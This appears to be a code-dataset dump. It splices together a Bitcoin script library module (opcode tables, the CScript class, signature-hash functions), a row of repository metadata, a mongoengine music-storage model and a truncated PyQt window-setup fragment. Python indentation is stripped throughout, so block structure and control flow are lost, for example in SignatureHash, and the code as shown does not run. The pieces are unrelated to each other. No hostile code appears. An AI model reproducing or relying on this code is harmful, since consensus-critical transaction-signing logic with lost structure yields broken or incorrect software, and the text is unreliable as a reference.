OP_XOR: 'OP_XOR',
OP_EQUAL: 'OP_EQUAL',
OP_EQUALVERIFY: 'OP_EQUALVERIFY',
OP_RESERVED1: 'OP_RESERVED1',
OP_RESERVED2: 'OP_RESERVED2',
OP_1ADD: 'OP_1ADD',
OP_1SUB: 'OP_1SUB',
OP_2MUL: 'OP_2MUL',
OP_2DIV: 'OP_2DIV',
OP_NEGATE: 'OP_NEGATE',
OP_ABS: 'OP_ABS',
OP_NOT: 'OP_NOT',
OP_0NOTEQUAL: 'OP_0NOTEQUAL',
OP_ADD: 'OP_ADD',
OP_SUB: 'OP_SUB',
OP_MUL: 'OP_MUL',
OP_DIV: 'OP_DIV',
OP_MOD: 'OP_MOD',
OP_LSHIFT: 'OP_LSHIFT',
OP_RSHIFT: 'OP_RSHIFT',
OP_BOOLAND: 'OP_BOOLAND',
OP_BOOLOR: 'OP_BOOLOR',
OP_NUMEQUAL: 'OP_NUMEQUAL',
OP_NUMEQUALVERIFY: 'OP_NUMEQUALVERIFY',
OP_NUMNOTEQUAL: 'OP_NUMNOTEQUAL',
OP_LESSTHAN: 'OP_LESSTHAN',
OP_GREATERTHAN: 'OP_GREATERTHAN',
OP_LESSTHANOREQUAL: 'OP_LESSTHANOREQUAL',
OP_GREATERTHANOREQUAL: 'OP_GREATERTHANOREQUAL',
OP_MIN: 'OP_MIN',
OP_MAX: 'OP_MAX',
OP_WITHIN: 'OP_WITHIN',
OP_RIPEMD160: 'OP_RIPEMD160',
OP_SHA1: 'OP_SHA1',
OP_SHA256: 'OP_SHA256',
OP_HASH160: 'OP_HASH160',
OP_HASH256: 'OP_HASH256',
OP_CODESEPARATOR: 'OP_CODESEPARATOR',
OP_CHECKSIG: 'OP_CHECKSIG',
OP_CHECKSIGVERIFY: 'OP_CHECKSIGVERIFY',
OP_CHECKMULTISIG: 'OP_CHECKMULTISIG',
OP_CHECKMULTISIGVERIFY: 'OP_CHECKMULTISIGVERIFY',
OP_NOP1: 'OP_NOP1',
OP_NOP2: 'OP_NOP2',
OP_CHECKLOCKTIMEVERIFY: 'OP_CHECKLOCKTIMEVERIFY',
OP_NOP3: 'OP_NOP3',
OP_NOP4: 'OP_NOP4',
OP_NOP5: 'OP_NOP5',
OP_NOP6: 'OP_NOP6',
OP_NOP7: 'OP_NOP7',
OP_NOP8: 'OP_NOP8',
OP_NOP9: 'OP_NOP9',
OP_NOP10: 'OP_NOP10',
OP_SMALLINTEGER: 'OP_SMALLINTEGER',
OP_PUBKEYS: 'OP_PUBKEYS',
OP_PUBKEYHASH: 'OP_PUBKEYHASH',
OP_PUBKEY: 'OP_PUBKEY',
OP_INVALIDOPCODE: 'OP_INVALIDOPCODE',
})
OPCODES_BY_NAME = {
'OP_0': OP_0,
'OP_PUSHDATA1': OP_PUSHDATA1,
'OP_PUSHDATA2': OP_PUSHDATA2,
'OP_PUSHDATA4': OP_PUSHDATA4,
'OP_1NEGATE': OP_1NEGATE,
'OP_RESERVED': OP_RESERVED,
'OP_1': OP_1,
'OP_2': OP_2,
'OP_3': OP_3,
'OP_4': OP_4,
'OP_5': OP_5,
'OP_6': OP_6,
'OP_7': OP_7,
'OP_8': OP_8,
'OP_9': OP_9,
'OP_10': OP_10,
'OP_11': OP_11,
'OP_12': OP_12,
'OP_13': OP_13,
'OP_14': OP_14,
'OP_15': OP_15,
'OP_16': OP_16,
'OP_NOP': OP_NOP,
'OP_VER': OP_VER,
'OP_IF': OP_IF,
'OP_NOTIF': OP_NOTIF,
'OP_VERIF': OP_VERIF,
'OP_VERNOTIF': OP_VERNOTIF,
'OP_ELSE': OP_ELSE,
'OP_ENDIF': OP_ENDIF,
'OP_VERIFY': OP_VERIFY,
'OP_RETURN': OP_RETURN,
'OP_TOALTSTACK': OP_TOALTSTACK,
'OP_FROMALTSTACK': OP_FROMALTSTACK,
'OP_2DROP': OP_2DROP,
'OP_2DUP': OP_2DUP,
'OP_3DUP': OP_3DUP,
'OP_2OVER': OP_2OVER,
'OP_2ROT': OP_2ROT,
'OP_2SWAP': OP_2SWAP,
'OP_IFDUP': OP_IFDUP,
'OP_DEPTH': OP_DEPTH,
'OP_DROP': OP_DROP,
'OP_DUP': OP_DUP,
'OP_NIP': OP_NIP,
'OP_OVER': OP_OVER,
'OP_PICK': OP_PICK,
'OP_ROLL': OP_ROLL,
'OP_ROT': OP_ROT,
'OP_SWAP': OP_SWAP,
'OP_TUCK': OP_TUCK,
'OP_CAT': OP_CAT,
'OP_SUBSTR': OP_SUBSTR,
'OP_LEFT': OP_LEFT,
'OP_RIGHT': OP_RIGHT,
'OP_SIZE': OP_SIZE,
'OP_INVERT': OP_INVERT,
'OP_AND': OP_AND,
'OP_OR': OP_OR,
'OP_XOR': OP_XOR,
'OP_EQUAL': OP_EQUAL,
'OP_EQUALVERIFY': OP_EQUALVERIFY,
'OP_RESERVED1': OP_RESERVED1,
'OP_RESERVED2': OP_RESERVED2,
'OP_1ADD': OP_1ADD,
'OP_1SUB': OP_1SUB,
'OP_2MUL': OP_2MUL,
'OP_2DIV': OP_2DIV,
'OP_NEGATE': OP_NEGATE,
'OP_ABS': OP_ABS,
'OP_NOT': OP_NOT,
'OP_0NOTEQUAL': OP_0NOTEQUAL,
'OP_ADD': OP_ADD,
'OP_SUB': OP_SUB,
'OP_MUL': OP_MUL,
'OP_DIV': OP_DIV,
'OP_MOD': OP_MOD,
'OP_LSHIFT': OP_LSHIFT,
'OP_RSHIFT': OP_RSHIFT,
'OP_BOOLAND': OP_BOOLAND,
'OP_BOOLOR': OP_BOOLOR,
'OP_NUMEQUAL': OP_NUMEQUAL,
'OP_NUMEQUALVERIFY': OP_NUMEQUALVERIFY,
'OP_NUMNOTEQUAL': OP_NUMNOTEQUAL,
'OP_LESSTHAN': OP_LESSTHAN,
'OP_GREATERTHAN': OP_GREATERTHAN,
'OP_LESSTHANOREQUAL': OP_LESSTHANOREQUAL,
'OP_GREATERTHANOREQUAL': OP_GREATERTHANOREQUAL,
'OP_MIN': OP_MIN,
'OP_MAX': OP_MAX,
'OP_WITHIN': OP_WITHIN,
'OP_RIPEMD160': OP_RIPEMD160,
'OP_SHA1': OP_SHA1,
'OP_SHA256': OP_SHA256,
'OP_HASH160': OP_HASH160,
'OP_HASH256': OP_HASH256,
'OP_CODESEPARATOR': OP_CODESEPARATOR,
'OP_CHECKSIG': OP_CHECKSIG,
'OP_CHECKSIGVERIFY': OP_CHECKSIGVERIFY,
'OP_CHECKMULTISIG': OP_CHECKMULTISIG,
'OP_CHECKMULTISIGVERIFY': OP_CHECKMULTISIGVERIFY,
'OP_NOP1': OP_NOP1,
'OP_NOP2': OP_NOP2,
'OP_CHECKLOCKTIMEVERIFY': OP_CHECKLOCKTIMEVERIFY,
'OP_NOP3': OP_NOP3,
'OP_NOP4': OP_NOP4,
'OP_NOP5': OP_NOP5,
'OP_NOP6': OP_NOP6,
'OP_NOP7': OP_NOP7,
'OP_NOP8': OP_NOP8,
'OP_NOP9': OP_NOP9,
'OP_NOP10': OP_NOP10,
'OP_SMALLINTEGER': OP_SMALLINTEGER,
'OP_PUBKEYS': OP_PUBKEYS,
'OP_PUBKEYHASH': OP_PUBKEYHASH,
'OP_PUBKEY': OP_PUBKEY,
}
# Invalid even when occurring in an unexecuted OP_IF branch due to either being
# disabled, or never having been implemented.
DISABLED_OPCODES = frozenset((OP_VERIF, OP_VERNOTIF,
OP_CAT, OP_SUBSTR, OP_LEFT, OP_RIGHT, OP_INVERT, OP_AND,
OP_OR, OP_XOR, OP_2MUL, OP_2DIV, OP_MUL, OP_DIV, OP_MOD,
OP_LSHIFT, OP_RSHIFT))
class CScriptInvalidError(Exception):
"""Base class for CScript exceptions"""
pass
class CScriptTruncatedPushDataError(CScriptInvalidError):
"""Invalid pushdata due to truncation"""
def __init__(self, msg, data):
self.data = data
super(CScriptTruncatedPushDataError, self).__init__(msg)
class CScript(bytes):
"""Serialized script
A bytes subclass, so you can use this directly whenever bytes are accepted.
    Note that this means that indexing does *not* work - you'll be indexing by
    byte rather than by opcode. This format was chosen for efficiency so that the
    general case would not require creating a lot of little CScriptOp objects.
iter(script) however does iterate by opcode.
"""
@classmethod
def __coerce_instance(cls, other):
# Coerce other into bytes
if isinstance(other, CScriptOp):
other = _bchr(other)
elif isinstance(other, (int, long)):
if 0 <= other <= 16:
other = bytes(_bchr(CScriptOp.encode_op_n(other)))
elif other == -1:
other = bytes(_bchr(OP_1NEGATE))
else:
other = CScriptOp.encode_op_pushdata(bitcoin.core._bignum.bn2vch(other))
elif isinstance(other, (bytes, bytearray)):
other = CScriptOp.encode_op_pushdata(other)
return other
def __add__(self, other):
# Do the coercion outside of the try block so that errors in it are
# noticed.
other = self.__coerce_instance(other)
try:
# bytes.__add__ always returns bytes instances unfortunately
return CScript(super(CScript, self).__add__(other))
except TypeError:
raise TypeError('Can not add a %r instance to a CScript' % other.__class__)
def join(self, iterable):
# join makes no sense for a CScript()
raise NotImplementedError
def __new__(cls, value=b''):
if isinstance(value, bytes) or isinstance(value, bytearray):
return super(CScript, cls).__new__(cls, value)
else:
def coerce_iterable(iterable):
for instance in iterable:
yield cls.__coerce_instance(instance)
# Annoyingly on both python2 and python3 bytes.join() always
# returns a bytes instance even when subclassed.
return super(CScript, cls).__new__(cls, b''.join(coerce_iterable(value)))
def raw_iter(self):
"""Raw iteration
        Yields tuples of (opcode, data, sop_idx) so that the different possible
        PUSHDATA encodings can be accurately distinguished, and so that the exact
        byte index of each opcode (sop_idx) is available.
"""
i = 0
while i < len(self):
sop_idx = i
opcode = _bord(self[i])
i += 1
if opcode > OP_PUSHDATA4:
yield (opcode, None, sop_idx)
else:
datasize = None
pushdata_type = None
if opcode < OP_PUSHDATA1:
pushdata_type = 'PUSHDATA(%d)' % opcode
datasize = opcode
elif opcode == OP_PUSHDATA1:
pushdata_type = 'PUSHDATA1'
if i >= len(self):
raise CScriptInvalidError('PUSHDATA1: missing data length')
datasize = _bord(self[i])
i += 1
elif opcode == OP_PUSHDATA2:
pushdata_type = 'PUSHDATA2'
if i + 1 >= len(self):
raise CScriptInvalidError('PUSHDATA2: missing data length')
datasize = _bord(self[i]) + (_bord(self[i+1]) << 8)
i += 2
elif opcode == OP_PUSHDATA4:
pushdata_type = 'PUSHDATA4'
if i + 3 >= len(self):
raise CScriptInvalidError('PUSHDATA4: missing data length')
datasize = _bord(self[i]) + (_bord(self[i+1]) << 8) + (_bord(self[i+2]) << 16) + (_bord(self[i+3]) << 24)
i += 4
else:
assert False # shouldn't happen
data = bytes(self[i:i+datasize])
# Check for truncation
if len(data) < datasize:
raise CScriptTruncatedPushDataError('%s: truncated data' % pushdata_type, data)
i += datasize
yield (opcode, data, sop_idx)
def __iter__(self):
"""'Cooked' iteration
        Returns either a CScriptOp instance, an integer, or bytes, as
appropriate.
See raw_iter() if you need to distinguish the different possible
PUSHDATA encodings.
"""
for (opcode, data, sop_idx) in self.raw_iter():
if opcode == 0:
yield 0
elif data is not None:
yield data
else:
opcode = CScriptOp(opcode)
if opcode.is_small_int():
yield opcode.decode_op_n()
else:
yield CScriptOp(opcode)
def __repr__(self):
# For Python3 compatibility add b before strings so testcases don't
# need to change
def _repr(o):
if isinstance(o, bytes):
return "x('%s')" % bitcoin.core.b2x(o)
else:
return repr(o)
ops = []
i = iter(self)
while True:
op = None
try:
op = _repr(next(i))
except CScriptTruncatedPushDataError as err:
op = '%s...<ERROR: %s>' % (_repr(err.data), err)
break
except CScriptInvalidError as err:
op = '<ERROR: %s>' % err
break
except StopIteration:
break
finally:
if op is not None:
ops.append(op)
return "CScript([%s])" % ', '.join(ops)
def is_p2sh(self):
"""Test if the script is a p2sh scriptPubKey
Note that this test is consensus-critical.
"""
return (len(self) == 23 and
_bord(self[0]) == OP_HASH160 and
_bord(self[1]) == 0x14 and
_bord(self[22]) == OP_EQUAL)
def is_witness_scriptpubkey(self):
"""Returns true if this is a scriptpubkey signaling segregated witness
data. """
return 3 <= len(self) <= 42 and CScriptOp(struct.unpack('<b',self[0])[0]).is_small_int()
def witness_version(self):
"""Returns the witness version on [0,16]. """
return next(iter(self))
def is_witness_v0_keyhash(self):
"""Returns true if this is a scriptpubkey for V0 P2WPKH. """
return len(self) == 22 and self[0:2] == b'\x00\x14'
def is_witness_v0_nested_keyhash(self):
"""Returns true if this is a scriptpubkey for V0 P2WPKH embedded in P2SH. """
return len(self) == 23 and self[0:3] == b'\x16\x00\x14'
def is_witness_v0_scripthash(self):
"""Returns true if this is a scriptpubkey for V0 P2WSH. """
return len(self) == 34 and self[0:2] == b'\x00\x20'
def is_witness_v0_nested_scripthash(self):
"""Returns true if this is a scriptpubkey for V0 P2WSH embedded in P2SH. """
return len(self) == 23 and self[0:2] == b'\xa9\x14' and self[-1] == b'\x87'
def is_push_only(self):
"""Test if the script only contains pushdata ops
Note that this test is consensus-critical.
Scripts that contain invalid pushdata ops return False, matching the
behavior in Bitcoin Core.
"""
try:
for (op, op_data, idx) in self.raw_iter():
# Note how OP_RESERVED is considered a pushdata op.
if op > OP_16:
return False
except CScriptInvalidError:
return False
return True
def has_canonical_pushes(self):
"""Test if script only uses canonical pushes
Not yet consensus critical; may be in the future.
"""
try:
for (op, data, idx) in self.raw_iter():
if op > OP_16:
continue
elif op < OP_PUSHDATA1 and op > OP_0 and len(data) == 1 and _bord(data[0]) <= 16:
# Could have used an OP_n code, rather than a 1-byte push.
return False
elif op == OP_PUSHDATA1 and len(data) < OP_PUSHDATA1:
# Could have used a normal n-byte push, rather than OP_PUSHDATA1.
return False
elif op == OP_PUSHDATA2 and len(data) <= 0xFF:
                    # Could have used an OP_PUSHDATA1.
return False
elif op == OP_PUSHDATA4 and len(data) <= 0xFFFF:
                    # Could have used an OP_PUSHDATA2.
return False
except CScriptInvalidError: # Invalid pushdata
return False
return True
def is_unspendable(self):
"""Test if the script is provably unspendable"""
return (len(self) > 0 and
_bord(self[0]) == OP_RETURN)
def is_valid(self):
"""Return True if the script is valid, False otherwise
The script is valid if all PUSHDATA's are valid; invalid opcodes do not
make is_valid() return False.
"""
try:
list(self)
except CScriptInvalidError:
return False
return True
def to_p2sh_scriptPubKey(self, checksize=True):
"""Create P2SH scriptPubKey from this redeemScript
That is, create the P2SH scriptPubKey that requires this script as a
redeemScript to spend.
checksize - Check if the redeemScript is larger than the 520-byte max
pushdata limit; raise ValueError if limit exceeded.
Since a >520-byte PUSHDATA makes EvalScript() fail, it's not actually
possible to redeem P2SH outputs with redeem scripts >520 bytes.
"""
if checksize and len(self) > MAX_SCRIPT_ELEMENT_SIZE:
raise ValueError("redeemScript exceeds max allowed size; P2SH output would be unspendable")
return CScript([OP_HASH160, bitcoin.core.Hash160(self), OP_EQUAL])
def GetSigOpCount(self, fAccurate):
"""Get the SigOp count.
fAccurate - Accurately count CHECKMULTISIG, see BIP16 for details.
Note that this is consensus-critical.
"""
n = 0
lastOpcode = OP_INVALIDOPCODE
for (opcode, data, sop_idx) in self.raw_iter():
if opcode in (OP_CHECKSIG, OP_CHECKSIGVERIFY):
n += 1
elif opcode in (OP_CHECKMULTISIG, OP_CHECKMULTISIGVERIFY):
if fAccurate and (OP_1 <= lastOpcode <= OP_16):
n += opcode.decode_op_n()
else:
n += 20
lastOpcode = opcode
return n
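# Illustrative sketch (not part of the original module) of the construction and
# iteration behaviour documented in the CScript docstring: small integers become
# OP_N opcodes, bytes become pushdata, and iteration is by opcode, not by byte.
#
#   script = CScript([OP_DUP, OP_HASH160, b'\x00' * 20, OP_EQUALVERIFY, OP_CHECKSIG])
#   len(script)                    # -> 25 (length in bytes)
#   list(script)                   # -> [OP_DUP, OP_HASH160, b'\x00'*20, OP_EQUALVERIFY, OP_CHECKSIG]
#   script.is_push_only()          # -> False
#   script.to_p2sh_scriptPubKey()  # -> OP_HASH160 <20-byte hash> OP_EQUAL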
class CScriptWitness(ImmutableSerializable):
"""An encoding of the data elements on the initial stack for (segregated
witness)
"""
__slots__ = ['stack']
def __init__(self, stack=()):
object.__setattr__(self, 'stack', stack)
def __len__(self):
return len(self.stack)
def __iter__(self):
return iter(self.stack)
def __repr__(self):
return 'CScriptWitness(' + ','.join("x('%s')" % bitcoin.core.b2x(s) for s in self.stack) + ')'
def is_null(self):
return len(self.stack) == 0
@classmethod
def stream_deserialize(cls, f):
n = VarIntSerializer.stream_deserialize(f)
stack = tuple(BytesSerializer.stream_deserialize(f) for i in range(n))
return cls(stack)
def stream_serialize(self, f):
VarIntSerializer.stream_serialize(len(self.stack), f)
for s in self.stack:
BytesSerializer.stream_serialize(s, f)
SIGHASH_ALL = 1
SIGHASH_NONE = 2
SIGHASH_SINGLE = 3
SIGHASH_ANYONECANPAY = 0x80
def FindAndDelete(script, sig):
"""Consensus critical, see FindAndDelete() in Satoshi codebase"""
r = b''
last_sop_idx = sop_idx = 0
skip = True
for (opcode, data, sop_idx) in script.raw_iter():
if not skip:
r += script[last_sop_idx:sop_idx]
last_sop_idx = sop_idx
if script[sop_idx:sop_idx + len(sig)] == sig:
skip = True
else:
skip = False
if not skip:
r += script[last_sop_idx:]
return CScript(r)
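# Illustrative example (not part of the original module): FindAndDelete()
# removes occurrences of the serialized bytes `sig` that start on an opcode
# boundary; this is how OP_CODESEPARATOR is stripped from the script in
# RawSignatureHash() below.
#
#   FindAndDelete(CScript([OP_1, OP_CODESEPARATOR, OP_2]),
#                 CScript([OP_CODESEPARATOR]))   # -> CScript([OP_1, OP_2])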
def IsLowDERSignature(sig):
"""
Loosely correlates with IsLowDERSignature() from script/interpreter.cpp
Verifies that the S value in a DER signature is the lowest possible value.
Used by BIP62 malleability fixes.
"""
length_r = sig[3]
if isinstance(length_r, str):
length_r = int(struct.unpack('B', length_r)[0])
length_s = sig[5 + length_r]
if isinstance(length_s, str):
length_s = int(struct.unpack('B', length_s)[0])
s_val = list(struct.unpack(str(length_s) + 'B', sig[6 + length_r:6 + length_r + length_s]))
# If the S value is above the order of the curve divided by two, its
# complement modulo the order could have been used instead, which is
# one byte shorter when encoded correctly.
max_mod_half_order = [
0x7f,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff,
0x5d,0x57,0x6e,0x73,0x57,0xa4,0x50,0x1d,
0xdf,0xe9,0x2f,0x46,0x68,0x1b,0x20,0xa0]
return CompareBigEndian(s_val, [0]) > 0 and \
CompareBigEndian(s_val, max_mod_half_order) <= 0
def CompareBigEndian(c1, c2):
"""
Loosely matches CompareBigEndian() from eccryptoverify.cpp
Compares two arrays of bytes, and returns a negative value if the first is
less than the second, 0 if they're equal, and a positive value if the
first is greater than the second.
"""
c1 = list(c1)
c2 = list(c2)
# Adjust starting positions until remaining lengths of the two arrays match
while len(c1) > len(c2):
if c1.pop(0) > 0:
return 1
while len(c2) > len(c1):
if c2.pop(0) > 0:
return -1
while len(c1) > 0:
diff = c1.pop(0) - c2.pop(0)
if diff != 0:
return diff
return 0
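# Illustrative examples (not part of the original module); the arguments are
# big-endian digit lists, so leading zeros do not affect the comparison:
#
#   CompareBigEndian([0, 1], [1]) == 0      # both represent 1
#   CompareBigEndian([2], [1, 255]) < 0     # 2 < 511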
def RawSignatureHash(script, txTo, inIdx, hashtype):
"""Consensus-correct SignatureHash
Returns (hash, err) to precisely match the consensus-critical behavior of
the SIGHASH_SINGLE bug. (inIdx is *not* checked for validity)
If you're just writing wallet software you probably want SignatureHash()
instead.
"""
HASH_ONE = b'\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00'
if inIdx >= len(txTo.vin):
return (HASH_ONE, "inIdx %d out of range (%d)" % (inIdx, len(txTo.vin)))
txtmp = bitcoin.core.CMutableTransaction.from_tx(txTo)
for txin in txtmp.vin:
txin.scriptSig = b''
txtmp.vin[inIdx].scriptSig = FindAndDelete(script, CScript([OP_CODESEPARATOR]))
if (hashtype & 0x1f) == SIGHASH_NONE:
txtmp.vout = []
for i in range(len(txtmp.vin)):
if i != inIdx:
txtmp.vin[i].nSequence = 0
elif (hashtype & 0x1f) == SIGHASH_SINGLE:
outIdx = inIdx
if outIdx >= len(txtmp.vout):
return (HASH_ONE, "outIdx %d out of range (%d)" % (outIdx, len(txtmp.vout)))
tmp = txtmp.vout[outIdx]
txtmp.vout = []
for i in range(outIdx):
txtmp.vout.append(bitcoin.core.CTxOut())
txtmp.vout.append(tmp)
for i in range(len(txtmp.vin)):
if i != inIdx:
txtmp.vin[i].nSequence = 0
if hashtype & SIGHASH_ANYONECANPAY:
tmp = txtmp.vin[inIdx]
txtmp.vin = []
txtmp.vin.append(tmp)
txtmp.wit = bitcoin.core.CTxWitness()
s = txtmp.serialize()
s += struct.pack(b"<i", hashtype)
hash = bitcoin.core.Hash(s)
return (hash, None)
SIGVERSION_BASE = 0
SIGVERSION_WITNESS_V0 = 1
def SignatureHash(script, txTo, inIdx, hashtype, amount=None, sigversion=SIGVERSION_BASE):
"""Calculate a signature hash
'Cooked' version that checks if inIdx is out of bounds - this is *not*
consensus-correct behavior, but is what you probably want for general
wallet use.
"""
if sigversion == SIGVERSION_WITNESS_V0:
hashPrevouts = b'\x00'*32
hashSequence = b'\x00'*32
hashOutputs = b'\x00'*32
if not (hashtype & SIGHASH_ANYONECANPAY):
serialize_prevouts = bytes()
for i in txTo.vin:
serialize_prevouts += i.prevout.serialize()
hashPrevouts = bitcoin.core.Hash(serialize_prevouts)
if (not (hashtype & SIGHASH_ANYONECANPAY) and (hashtype & 0x1f) != SIGHASH_SINGLE and (hashtype & 0x1f) != SIGHASH_NONE):
serialize_sequence = bytes()
for i in txTo.vin:
serialize_sequence += struct.pack("<I", i.nSequence)
hashSequence = bitcoin.core.Hash(serialize_sequence)
if ((hashtype & 0x1f) != SIGHASH_SINGLE and (hashtype & 0x1f) != SIGHASH_NONE):
serialize_outputs = bytes()
for o in txTo.vout:
serialize_outputs += o.serialize()
hashOutputs = bitcoin.core.Hash(serialize_outputs)
elif ((hashtype & 0x1f) == SIGHASH_SINGLE and inIdx < len(txTo.vout)):
serialize_outputs = txTo.vout[inIdx].serialize()
hashOutputs = bitcoin.core.Hash(serialize_outputs)
f = _BytesIO()
f.write(struct.pack("<i", txTo.nVersion))
f.write(hashPrevouts)
f.write(hashSequence)
txTo.vin[inIdx].prevout.stream_serialize(f)
BytesSerializer.stream_serialize(script, f)
f.write(struct.pack("<q", amount))
f.write(struct.pack("<I", txTo.vin[inIdx].nSequence))
f.write(hashOutputs)
f.write(struct.pack("<i", txTo.nLockTime))
f.write(struct.pack("<i", hashtype))
return bitcoin.core.Hash(f.getvalue())
assert not script.is_witness_scriptpubkey()
(h, err) = RawSignatureHash(script, txTo, inIdx, hashtype)
if err is not None:
raise ValueError(err)
return h
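# Illustrative wallet-side sketch (not part of the original module): signing
# input 0 of a mutable transaction `tx` against the scriptPubKey it spends.
# `txin_scriptPubKey` and `seckey` (e.g. a bitcoin.wallet.CBitcoinSecret) are
# assumed to be defined elsewhere.
#
#   sighash = SignatureHash(txin_scriptPubKey, tx, 0, SIGHASH_ALL)
#   sig = seckey.sign(sighash) + _bchr(SIGHASH_ALL)
#   tx.vin[0].scriptSig = CScript([sig, seckey.pub])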
__all__ = (
'MAX_SCRIPT_SIZE',
'MAX_SCRIPT_ELEMENT_SIZE',
'MAX_SCRIPT_OPCODES',
'OPCODE_NAMES',
'CScriptOp',
# every opcode
'OP_0',
'OP_FALSE',
'OP_PUSHDATA1',
'OP_PUSHDATA2',
'OP_PUSHDATA4',
'OP_1NEGATE',
'OP_RESERVED',
'OP_1',
'OP_TRUE',
'OP_2',
'OP_3',
'OP_4',
'OP_5',
'OP_6',
'OP_7',
'OP_8',
'OP_9',
'OP_10',
'OP_11',
'OP_12',
'OP_13',
'OP_14',
'OP_15',
'OP_16',
'OP_NOP',
'OP_VER',
'OP_IF',
'OP_NOTIF',
'OP_VERIF',
'OP_VERNOTIF',
'OP_ELSE',
'OP_ENDIF',
'OP_VERIFY',
'OP_RETURN',
'OP_TOALTSTACK',
'OP_FROMALTSTACK',
'OP_2DROP',
'OP_2DUP',
'OP_3DUP',
'OP_2OVER',
'OP_2ROT',
'OP_2SWAP',
'OP_IFDUP',
'OP_DEPTH',
'OP_DROP',
'OP_DUP',
'OP_NIP',
'OP_OVER',
'OP_PICK',
'OP_ROLL',
'OP_ROT',
'OP_SWAP',
'OP_TUCK',
'OP_CAT',
'OP_SUBSTR',
'OP_LEFT',
'OP_RIGHT',
'OP_SIZE',
'OP_INVERT',
'OP_AND',
'OP_OR',
'OP_XOR',
'OP_EQUAL',
'OP_EQUALVERIFY',
'OP_RESERVED1',
'OP_RESERVED2',
'OP_1ADD',
'OP_1SUB',
'OP_2MUL',
'OP_2DIV',
'OP_NEGATE',
'OP_ABS',
'OP_NOT',
'OP_0NOTEQUAL',
'OP_ADD',
'OP_SUB',
'OP_MUL',
'OP_DIV',
'OP_MOD',
'OP_LSHIFT',
'OP_RSHIFT',
'OP_BOOLAND',
'OP_BOOLOR',
'OP_NUMEQUAL',
'OP_NUMEQUALVERIFY',
'OP_NUMNOTEQUAL',
'OP_LESSTHAN',
'OP_GREATERTHAN',
'OP_LESSTHANOREQUAL',
'OP_GREATERTHANOREQUAL',
'OP_MIN',
'OP_MAX',
'OP_WITHIN',
'OP_RIPEMD160',
'OP_SHA1',
'OP_SHA256',
'OP_HASH160',
'OP_HASH256',
'OP_CODESEPARATOR',
'OP_CHECKSIG',
'OP_CHECKSIGVERIFY',
'OP_CHECKMULTISIG',
'OP_CHECKMULTISIGVERIFY',
'OP_NOP1',
'OP_NOP2',
'OP_CHECKLOCKTIMEVERIFY',
'OP_NOP3',
'OP_NOP4',
'OP_NOP5',
'OP_NOP6',
'OP_NOP7',
'OP_NOP8',
'OP_NOP9',
'OP_NOP10',
'OP_SMALLINTEGER',
'OP_PUBKEYS',
'OP_PUBKEYHASH',
'OP_PUBKEY',
'OP_INVALIDOPCODE',
'OPCODES_BY_NAME',
'DISABLED_OPCODES',
'CScriptInvalidError',
'CScriptTruncatedPushDataError',
'CScript',
'CScriptWitness',
'SIGHASH_ALL',
'SIGHASH_NONE',
'SIGHASH_SINGLE',
'SIGHASH_ANYONECANPAY',
'FindAndDelete',
'RawSignatureHash',
'SignatureHash',
'IsLowDERSignature',
'SIGVERSION_BASE',
'SIGVERSION_WITNESS_V0',
)
| gpl-3.0 | -7,740,762,687,538,103,000 | 28.58497 | 146 | 0.570777 | false |
DouFM/wang_fm | storage/music.py | 1 | 1709 | #!/usr/bin/env python
# encoding: utf-8
import mongoengine
from .base import BaseMongoStorage
from config import DB_HOST, DB_PORT, DB_NAME
mongoengine.connect(DB_NAME, host=DB_HOST, port=DB_PORT)
class MusicStorage(BaseMongoStorage, mongoengine.Document):
"""store music info
key str
title str
artist str
album str
company str
public_time str
kbps str
cover file
audio file
upload_date datetime
uuid str
"""
title = mongoengine.StringField(max_length=256, default='')
artist = mongoengine.StringField(max_length=256, default='')
album = mongoengine.StringField(max_length=256, default='')
company = mongoengine.StringField(max_length=256, default='')
public_time = mongoengine.StringField(max_length=10, default='')
kbps = mongoengine.StringField(max_length=5, default='')
cover = mongoengine.FileField()
audio = mongoengine.FileField()
upload_date = mongoengine.DateTimeField()
uuid = mongoengine.StringField(unique=True)
meta = {
'ordering': ['-upload_date']
}
def __str__(self):
return 'title=%s, artist=%s, album=%s' % (self.title, self.artist, self.album)
def delete(self):
self.cover.delete()
self.audio.delete()
super(MusicStorage, self).delete()
def update(self, **kwargs):
cover = kwargs.pop('cover', None)
audio = kwargs.pop('audio', None)
if cover:
self.cover.replace(cover)
if audio:
self.audio.replace(audio)
self.save()
super(MusicStorage, self).update(**kwargs)
| mit | -6,727,684,040,444,985,000 | 28.982456 | 86 | 0.607958 | false |
hikaruAi/timeShoot | mainwindow.py | 1 | 4123 | MainForm.setObjectName(_fromUtf8("MainForm"))
MainForm.resize(281, 120)
MainWindow.browseButton = QtGui.QPushButton(MainForm)
MainWindow.browseButton.setGeometry(QtCore.QRect(150, 30, 51, 21))
MainWindow.browseButton.setFlat(False)
MainWindow.browseButton.setObjectName(_fromUtf8("browseButton"))
MainWindow.ouputText = QtGui.QLineEdit(MainForm)
MainWindow.ouputText.setGeometry(QtCore.QRect(10, 30, 141, 20))
MainWindow.ouputText.setObjectName(_fromUtf8("ouputText"))
MainWindow.label = QtGui.QLabel(MainForm)
MainWindow.label.setGeometry(QtCore.QRect(10, 10, 71, 16))
MainWindow.label.setObjectName(_fromUtf8("label"))
MainWindow.label_2 = QtGui.QLabel(MainForm)
MainWindow.label_2.setGeometry(QtCore.QRect(10, 60, 91, 16))
MainWindow.label_2.setObjectName(_fromUtf8("label_2"))
MainWindow.formatBox = QtGui.QComboBox(MainForm)
MainWindow.formatBox.setGeometry(QtCore.QRect(120, 80, 69, 22))
MainWindow.formatBox.setObjectName(_fromUtf8("formatBox"))
MainWindow.formatBox.addItem(_fromUtf8(""))
MainWindow.formatBox.addItem(_fromUtf8(""))
MainWindow.formatBox.addItem(_fromUtf8(""))
MainWindow.formatBox.addItem(_fromUtf8(""))
MainWindow.formatBox.addItem(_fromUtf8(""))
MainWindow.label_3 = QtGui.QLabel(MainForm)
MainWindow.label_3.setGeometry(QtCore.QRect(120, 60, 61, 16))
MainWindow.label_3.setObjectName(_fromUtf8("label_3"))
MainWindow.delayBox = QtGui.QDoubleSpinBox(MainForm)
MainWindow.delayBox.setGeometry(QtCore.QRect(10, 80, 81, 22))
MainWindow.delayBox.setDecimals(3)
MainWindow.delayBox.setMinimum(0.001)
MainWindow.delayBox.setMaximum(999999.999)
MainWindow.delayBox.setSingleStep(5.0)
